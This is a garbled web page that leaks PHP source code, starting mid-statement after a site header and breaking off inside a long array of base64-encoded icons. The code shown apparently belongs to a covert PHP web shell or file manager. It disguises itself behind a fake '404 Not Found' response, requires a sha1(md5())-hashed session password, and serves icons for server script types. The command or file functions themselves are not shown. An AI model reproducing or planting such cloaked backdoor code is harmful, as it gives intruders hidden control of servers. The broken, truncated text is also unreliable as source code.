Welcome
Login / Register
404 Not Found

Not Found

The requested URL ',$_SERVER['PHP_SELF'],' was not found on this server.

'; die; } } $Auth = FALSE; if ($Auth !== FALSE) { session_start(); $NoPASS = TRUE; if (!empty($_SESSION['SLOGIN'])) { if ($_SESSION['SLOGIN'] === $Password) { $NoPASS = FALSE; } } if (isset($_POST['pass'])) { $ShaPass = sha1(md5($_POST['pass'])); if ($ShaPass === $Password) { $_SESSION['SLOGIN'] = $ShaPass; $NoPASS = FALSE; } else { $WrongPass = TRUE; } } if ($NoPASS) { echo ' Log in
'; if (isset($WrongPass)) { echo 'Wrong password, please try again.

'; } echo 'Please enter the password:
'; die; } } $IsAction = isset($_REQUEST['action']); if ($IsAction && $_GET['action'] === 'img') { header('Expires: '.date('D, d M Y H:i:s',time()+86400).' GMT'); header('Cache-Control: public'); header('Last modified: ' . date ('D, d M Y H:i:s', getlastmod()) . ' GMT'); if (isset($_REQUEST['image'])) { if ($_REQUEST['image'] === 'backb') { header('Content-Type: image/png'); echo base64_decode('iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAMAAAC6V+0/AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAABhQTFRFnMjhZq3UDXu24e30L5PLSYivAGeY////Be3CegAAAAh0Uk5T/////////wDeg71ZAAAAiElEQVR42mzQ2wrDMAwDUMmO0v//4/nWLIPppXCwTSM8f4L+UIhQN8qZCIcOgplmDWJFbg3UMrPQWC5lIqxCd9SwAnVZ3YiFB/s1q8uEEveYtQ5uc/c6Ujq41ZOp6+Ctua7CzVfN45eIX12qF53ZGkS/ndbapmmJOgp9+0Sx8eozmVn8NP8RYAC3HQXzIa0m6wAAAABJRU5ErkJggg=='); } elseif ($_REQUEST['image'] === 'forwardb') { header('Content-Type: image/png'); echo base64_decode('iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAMAAAC6V+0/AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAABhQTFRFnMfgBnCmZazV7fT5HIbBzOLvSYqy////TGVm9QAAAAh0Uk5T/////////wDeg71ZAAAAiklEQVR42mzQQQ7EMAgDQAOG/P/HC4S0jbRcKo0IBWP9KeyPBrI0vhjmjUA8iE1VrbgsgqWJ0eauSlIEWmjd5u5twkiMmVYqVflwzTQytTHXW8dSrZUbmyhqhgfHaJ9O3tYzT99MzL/nSuq3SfRFUfvhGPbtSnlrbq80Lzt5YrN+8izWCn6S/wkwAOuyBcSEKJ+VAAAAAElFTkSuQmCC'); } elseif ($_REQUEST['image'] === 'c37') { header('Content-Type: image/png'); echo base64_decode('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'); } header('Content-Type: image/gif'); if ($_REQUEST['image'] === 'dir') { echo base64_decode('R0lGODlhEQAOALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAARAA4AAARIEMlJaxUYA0vFKQVBCBsnDGg6ZNkkgHAMEkP5inhOGLV067tgD/EDGnbDoujIpNlCuibviZPupr6ClWnAElVgVQkBKJvPZ0QEADs='); } elseif ($_GET['image'] === 'link') { echo base64_decode('R0lGODlhFAAVALMMADZITbzFye73/Nng5dPa3/j7/WNwdJ6preXt8n+Lj9/n7Ojy+AAAAAAAAAAAAAAAACH5BAEAAAwALAAAAAAUABUAAAS+kMlJyRKEam2XX8hGDcolFIIALpmmqCcbHEkgIIqmXkFiAEDAoaBAtBiIjyARDCYECsVAEvjwAAnfz3CLZkofRBKR9QEGuMG0A0oqDvCAwWBTKwJIsXhxMBwIBUxDagMZFntyfigBAQgFBIUZB2IlB0ADREULkQQZCQQ4CgQ1BQiEnah4CQcLUUU3aqiyCRKfUYSxsgM9E6tSp52xM3MUqwS/wjRzxL1ZB4wzWssGGmVl08siDNbY1Nq1PlrfEQA7'); } elseif ($_REQUEST['image'] === 'down') { echo base64_decode('R0lGODlhFAAUAOYAAP//////AP8A//8AAAD//wD/AAAA/wAAAMK/ya6ruLCtwdHO4by6yqimu9TT5GBgb3V1hdfX5qystq6ut6qqr8bGy9DQ09ze8bu8xrCxuszO3t3f7KmrtKyutpecr8HG2JiesKyzxoiNm7O3w77G2cXN4Kmvvt3i7qauwL3ByrO7y5uhrd7k8JKYo8PK17bA0J+msqyzv7nE1dje59Ta48vV47vI2KOtudHa5b7L2sLO3Nnh6t/m7tPe6drj7Nfg6dzk7Nzj6uXr8drk7L/Izpmvsdja2omjocnd2Hedh4ysl5a9n6zQsl2wY5HQli2sMCmJLGakZwKzAgOVBArMChKOEzbNNlHeUGDgYEyqTUabR2XNZYvii6zrrOL64vP/83zee8Tyw+np6f///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAGMALAAAAAAUABQAAAf/gGOCg0ZRWYdaWkuDjI1MYQBfkl5RjZZjj19em5SXghYjDEpdYV2mXVEIDBiWJjk3S1xdXLRgTUQuKBWMYjdMTE5cYFhbxVlaUEcIjEEoj11gV1bTT09TVUWshCE5wVhWVFJSU9dMJR2MRigkME1XVOHjVUoLJByMFigvICtN8OLzFBApAQNfCBsyPsB4Em6KEg0aaNRYgU9FiRo1NKTI8mSJgx87ZkxkVEFGCSA4cJyggYTFDiBCdvSgOCiFDhs1ePDYcYIFDyExcfQoOAhDDhQ2dODYoXNnShU6bjDCwEJoj6s7fAwBAiQIDR4jGGUw0aKsWbMrYoRQQVNQDBEPLh5AmCsXwgMRIZIU8cAohYsVDDQ4iDCY8IYLTpA0SJchw4THkB9L4JBAAgVBgQAAOw=='); } die; } else { header('Content-Type: image/gif'); $_GET['ext'] = substr($_GET['ext'], 1); $UnKnown = 'R0lGODlhEAAQANUAAAAAAP////7+/f39/Pz8+/v7+vr6+fn5+Pj49/38+/z7+vv6+fr5+Pn49/j39vf29fb19PX08/Py8fj29vf19fb09PXz8/Ty8vPx8fLw8P38/Pz7+/v6+vr5+fn4+Pj39/f29vb19fX09PTz8/Py8ubl5eDf3/b29srKysXFxcDAwL+/v729vby8vLq6urm5ubi4uLW1tbOzs7Gxsa2traysrJ2dnZCQkIaGhnl5ef///wAAAAAAAAAAAAAAAAAAACH5BAEAADoALAAAAAAQABAAAAacQJ1ORSwWV8LkcEMYDAQCggD1UupWBaYTKkidqkmWIdt8ClwwmCvZYhg4ijK0ZFoLXQ03vGyGJWEODQcdexp9STEggYMcBQSGAjFJMiEPix0LjgkDMkkzFZUOCB6YjgQzSTQWIhCWH6SZGzRJNRerrROvbgU1STYktqwUILoGNkk3GBK2ERDDH3k3STgZyhcjzc8NOEk53t/g3zpBADs='; if ($_GET['ext'] === '') { echo base64_decode($UnKnown); die; } $ImgArray = array( array('html','htm','xhtml','xht','xml','mht','mhtml','shtml','dtd','chm','xhtm'),'lhEAAQANUlAICCfJmZmSdRjfDTg01LOfDn2Ni8dauik8a3oMe/sz1urFlZWSUvPShSjbu+wU6GzM7OzoN2QIN2QbjJuJ6ulbmzrHWgx/bw6mtvdLWfYOjTsU2GzO7fxd7e3h88ZbuqkBUsQjxtrFhYWDAwMP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACUALAAAAAAQABAAAAaywJKwtBAZj8ahctFpNiuigEgpZJKupAuGJKUqPFEsBsIdCRWSAWUT8jhIAAyGYFZMOBxDBiAAOS4dFQBmDRwXGgMZIW0YHYAVIw0PhgMGIWweIAkXBR8jHhYWAwEWG5ggFQWdnxuhBmwhApmpHJ4lAq0beiIeDBgHeLYgiyEZEQQMIAAfHBq2JSAeAiIEBMoHCRrOZkMg3iIHBwjaGhncQiIJFR8ICB/vGeZKIiP19vcjQQA7', array('php','phtml','php3','php4','php5','php6','phtm','phps'),'lhEAAQANUAAH5/wIB/wVRUVYuLya6tpH2Bvn19v6io0ZycnIyMxqmpqYCAvoSFwZaWwJ2dznp5v0JDQSorKhISEsLDwXd5vuTm8+Hg5ZGSkTg5NDIxMYB/wIuNi5SUx1BQUayttrW1wH57wIiGhYiIh4aGxMC+4ZeXmKKfn6SlrJ+foXJwu7e3z5iYxHh3v7693vj69qysqqqprqyqq6Cfyq+ur8TE1bu8xk9PTnx8v2FiYXR1aYODfX+AwICAwYCAv////4CAwCH5BAAAAAAALAAAAAAQABAAAAaxwEDvF9Dwdj3eIrDj/Z6/XWCR3O2evQA0Srw6ecesE6v9GR8UA0+z+I2b1l5PReOANHjoOjDov3IkFAV9AAZRPA0xCAcoGTMOK4oyCQAAAwoSAiGYAiKcOjQAPAMINj4RGx2nqacfBpYoEBYQFxAuGbUWGDWvlxIYHic4FgImvzA0BnwlEBUMCQcpLQjNIw9SIxMEBxQADzwB2gcsPEM9HA4MAFvo6lsGN+vv8Vv19ltBADs=', array('asp','asphtml'),'lhEAAQAOYAAAAAAP////7+/v39/fz8/Pv7+/r6+vn5+fj4+Pf39/b29vX19fT09PPz8/Ly8vHx8fDw8O/v7+3t7enp6eXl5ePj4+Hh4d7e3tvb29ra2tnZ2dfX19bW1tPT09HR0c/Pz83NzczMzMrKysnJycfHx8TExMPDw8DAwL6+vr29vby8vLq6urm5ubW1tbGxsa6urq2trampqaenp6ampqOjo6KioqGhoaCgoJycnJqampeXl5aWlpWVlZGRkYyMjIuLi4iIiIaGhoWFhYKCgn9/f35+fnx8fHh4eHZ2dnR0dHJycm5ubmlpaWRkZF9fX1lZWVhYWFdXV01NTUxMTElJSUVFRUREREBAQD4+Pjs7Ozk5OTg4ODU1NTQ0NDIyMjAwMC4uLi0tLSwsLCsrKyoqKikpKSgoKCQkJCMjIyIiIh8fHx4eHh0dHRwcHBoaGhkZGRgYGBcXFxYWFhMTExEREQ8PDwwMDAkJCQgICAcHBwYGBgEBAf///wAAAAAAAAAAACH5BAEAAHwALAAAAAAQABAAAAf8gAgDBwYFBQEJBAIFggEFBAwRCocCCYgPBAUCAwMCHzUtIyMmISIqOxwJCIQFKEU6Li4/PzcvMBgBuY4VHjpbPiApUFxCEz9JRDsPDgFGAFEFQnoAeUdlAAB1QAsGVgBmGF5yNlVLcGY+dGIDF2hteCxqcEM5G3NUEWFvAStyQQA0lGDbgqPNHCwApgjgoacJACQWnGgBAEeOnjVZVARIgg3AFyEyWpzZAyALCQ0FGHQhQ4QNtjtM7IABcGVAAAYW3OTYGOeJGgBpaoyRAsGQhBcZEHSYQeFEjw4DYpQgcADBggACDggIYCBXplyJBDRIwGAQgUEGBhQ6pCoQADs=', array('aspx','armx','asax','ashx','asmx','axd'),'lhEAAQAKIFAP///4Kj1cfS6CBHnV5/vv///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANXWLTcrUGIQOK0gRIBwOwdB1Je6FVc5AUeJwKqKrXrCwoEOOZg4w0DHY0AHCyADuNCUATOABVTJ1CcDD7ECbOJG2R0kSK0+yUat8ENMcODpZrw+KAglxcSADs=', array('txt','ans','asc','rtf','doc','dot','mcw','docx','dotx','log'),'lhEAAQANU+ALq6uvz8+7i4uPv7+uDh476+vvj39vj39/r6+fz7+/b19Pn49/Pz9vr5+fn4+LW1teXl6PXz8/v6+fv6+rOzs/X09LGxsfz7+vf19fTy8p2dnfn5+IaGhvf29djY2q2trff29pCQkPr5+KysrPb29uDf3/Py8ebl5fr6+vb19by8vP38/MXFxfPy8vP08/Lw8PPx8fLy8r29vf38+/X087+/v/Tz87u7u8rKyv7+/f39/MDAwHl5ecjW4P///wAAACH5BAEAAD4ALAAAAAAQABAAAAaWQJ9vt2MQjcUdSsjcJQoeHTRQwAFcTF9tQIDoujkCi3SLMWWIQSKg0+VyAIEAwFSJEJML2507lehCAD2DhIU9AkwCBgsbDXkBK3yIQg+Glg9MFCkdi40SAwEzOhRMFpaGFkwfERUKnAcODZ8JH0wjp4UjTBotGawKGCCwdxpMIbiEIUwcLzAmGTY0wMILHEw82Nna2T5BADs=', array('jsp','jar','j','jad','jav','java','jsp10','class'),'lhEAAQAOYAAAAAAP///6/A0M7X31l5k1t7lV19l159ll9+l26NpnaQpXSNoomhtZCnuomer5asv5+1yJusuqy9zKqwtUhmfFl6lFh5k1Zyh1ZxhV15jmiGnWeEm2yHm3uUqIKbr4egtIier4edromerqu7x7C9x9Xa3j1cck9sgWSAlGB5i6azvLC9xrfCytjb3bbCyeCwgOh1DOl6E+l+GuSCJOuFJuqEJumKM+yOOOi0guq4ie27jOi9lOvRuvDZxP39/fz8/Pv7+/r6+vn5+ff39/b29vX19fT09PPz8/Dw8O/v7+7u7u3t7ezs7Orq6unp6ejo6Ofn5+bm5uXl5eTk5OPj4+Li4uHh4eDg4N/f397e3t3d3dzc3Nvb29nZ2djY2NbW1tXV1dTU1P///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAGIALAAAAAAQABAAAAffgAMCEISFhoQCAxIlRUOOj0aPRSUSD0s/Ppk+P0Y9QZk/Sw8NTECmQEFHOjdFp0wNDE5Cs0JIOTRJPEWzTgweUETBRzsyUDg1R8FQHh1TR89IMdHSSM9THQtWSNtMNlYwTExUUUpWCxxZS05aWlkzL1lUCiJVWxwoW01RFQYaBRUaIuwD4QVFhi5QqFBh4cLFChItvCBwACbDhS9TplzZYIGAhQ1XDoS4EubCCS5QsGzpwrJlFylQuJyggOXJiA8JcupM0IQJFgoYJjyBQrSo0SYTMKhIYaKp06dNU6gIBAA7', array('cfm','cfml','cfc'),'lhFAAUAMQAABRBY1uOsmmfvlSEqBtHaWSauj1sjlyStu7y8kV1mTRihJawwmeMpUt8oH6Zqtzk6WyRqyZSdM3a4/j6+sDP2q3Bz+Xs7ll8lIKjt3eZtEdxjnKNpFuDnwAAAAAAAAAAACH5BAAAAAAALAAAAAAUABQAAAXH4FEUQimMxXEEQzs0TUKaJaqyLZzIdJ2uuFdMNvP9grodyhYI5pIGlTSwkFgemOQuYTA0m4PK5EGRLAYQBoPD7boGmQlFmMgg7o+Lwp0TQ2ANBnELHAwaBgoKgAkUFgNbBhATDhF7iQpbjBaBO5EIDxIVl5idCxMQe4gMCBULDgqVEV2IHAgSHAaHqwwRsb2ziA4WtlgXExu9yZWjERcYrl0OBsoRBKOJyQS92tsE3tTg3d7eAOHV4+gA6gDo7ePr8OwE8fT1IQA7', array('png','gif','jpg','jpeg','bmp','ico','jfif','mng','nitf','pbm','pcx','pgm','pict','tga','tiff','tif','xbm','psd','jpx','jp2','rle','dib','rle','dcm','fxg','psb','iff','pxr','pdd','dds'),'lhEAAQANU/AMfY2PPz80eJbtX8/+z//7vE2HbX/zeH1om7zqSkpLDO9bPg/5bR/y9qbaurq56enuL9/y5smvz8/FGCo1Wmi/n5+cHy/+7u7tr//yNaL2mog0R8oZ/K2CdSZHaYsIjB2GK1/7CwsIy77G+w0sP7/0yR2XKn3IK/vcXc/0FrY3K//3CwrhtATluHjT18XH6y5pzGz1qt/8/n6TiDwUmAWV2Z1HGijXSilODf2cz0/0GJwuvr67KyspmZmf///////yH5BAEAAD8ALAAAAAAQABAAAAamwJ9wSCwaj0SecslsKn3QqFT6PFivhxHnw4H5eCFfSQWKkRkkAsHw8YVCEg4EslgwGBbIwIKQhBwVMgMEPgM5FhYDAz4AFQ6ALTcYBBiLlJWNDgkVKTQaCBA+aoSMFQkJARmqNAIaFCsjJzI4AacXLB0dDbsCLgICFDcBDw8XETM6NTUmJi8iCigFF8Q7EREbGxPaEx7dHjsPPTvj5OXlPejp6uvoQQA7', array('vbs','js','scpt','sh','bsh','pl','pn','pm','plx','tcl','ps1','mrc','as','py','pyc','pyw','ps','ncf','asa','csh','cgi','jsfl','json','au3','awk','applescript','aut','nsi','rpy','wsf'),'lhEAAQAOYAAAAAAP///yIiIykpKigoKTAwMS8vMC0tLioqKzw8PTs7PDY2NzQ0NVRUVVJSU1FRUk1NTktLTEdHSEJCQ1FSU0xNTklKSzEyMi8wMC4vLzo7O1RVVVJTU0tMTENEREBBQT9AQAIDAhwcGyoqKWNjYoyMjIqKiomJiYGBgYCAgHl5eXh4eHFxcWxsbGhoaGVlZWNjY15eXl1dXVlZWVdXV1RUVFNTU0xMTEtLS0lJSUhISEZGRkVFRURERENDQ0JCQkFBQT8/Pzw8PDs7Ozk5OTg4ODc3NzY2NjMzMzExMSoqKikpKSQkJCMjIyEhIR4eHh0dHRwcHBsbGxISEhERERAQEA4ODgkJCQYGBgUFBQICAv///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAFsALAAAAAAQABAAAAeqgFuCg4SFhQ4PDRuLHBAVG4UWMy0rKiorLDQ3TCCENiQnJaIlJi41TjuEETMora0pMg8UhRI5MTEyMrc4HYYeQzAvwi8wQhKGH0tGRUbLRiMThgpSPDk6Ojk8IgmGR1dVU1RUU1VXC4YXWUjMy0hYF4YHWgD09SEYhAw/Ojw9/j1AMmQxQIiIkCA+Evr4IUSDlQKEmiiJ8qRiRShJMggohICAx48EBhwgFAgAOw==', array('css','css1'),'lhEAAQAMQAAAAAAP///xw2hyA7jCVCkSpJlzBRnTZZpDxhqkFosEZvtUp0uk14vTBvw+zy+vD1/Dd2xz99y0mF0FKO1FyW2WSd3Wuk4e70++3z+rjU8e/1+////wAAAAAAAAAAAAAAACH5BAEAABsALAAAAAAQABAAAAVh4CaOZGmeaEoybOu+25LNdE0vm2LtfM8rm0Sl8ngMi0djYoOgaCjQZxRKQWwOk8tkm+VqJ4eNQYKRmM1ltMSwKUQiDgdcPn8XNgSIfs/fEzYDDYKDhIMDGwKJiouMKo6OIQA7', 